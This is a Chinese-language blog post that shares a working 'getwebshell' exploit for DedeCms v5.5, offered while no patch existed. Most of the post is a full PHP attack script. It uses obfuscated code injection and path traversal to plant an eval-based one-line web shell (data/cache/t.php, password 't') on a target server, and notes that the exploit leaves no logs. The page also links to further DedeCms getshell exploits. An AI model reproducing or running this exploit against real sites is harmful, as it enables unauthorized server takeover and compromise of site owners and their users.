DedeCms v5.5 0day

2010, March 8, 1:50 PM. oday收藏
Submitted by admin

官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

复制内容到剪贴板
代码:
<?php
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc < 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+   
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
$post_b = 'needCode=aa/../../../data/mysql_error_trace';
$shell = 'data/cache/t.php';

get_send($post_a);
post_send('plus/comments_frame.php',$post_b);
$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){
    echo "\nShell Address is:".$host.$path.$shell;
}else{
    echo "\nError.";
}
function get_send($url){
    global $host, $path;
    $message = "GET ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
   
    $back = '';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
   
}
function post_send($url,$cmd){
   
    global $host, $path;
    $message = "POST ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
   
    $back = '';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
?>
 

附件: dedecms 5.5 exp.rar (508.91 K, 下载次数:708)

Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27629, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35259, 评论: 0)
dedecms默认的注册用户 (浏览: 12808, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13578, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16190, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37411, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 21948, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 10977, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10098, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 17930, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):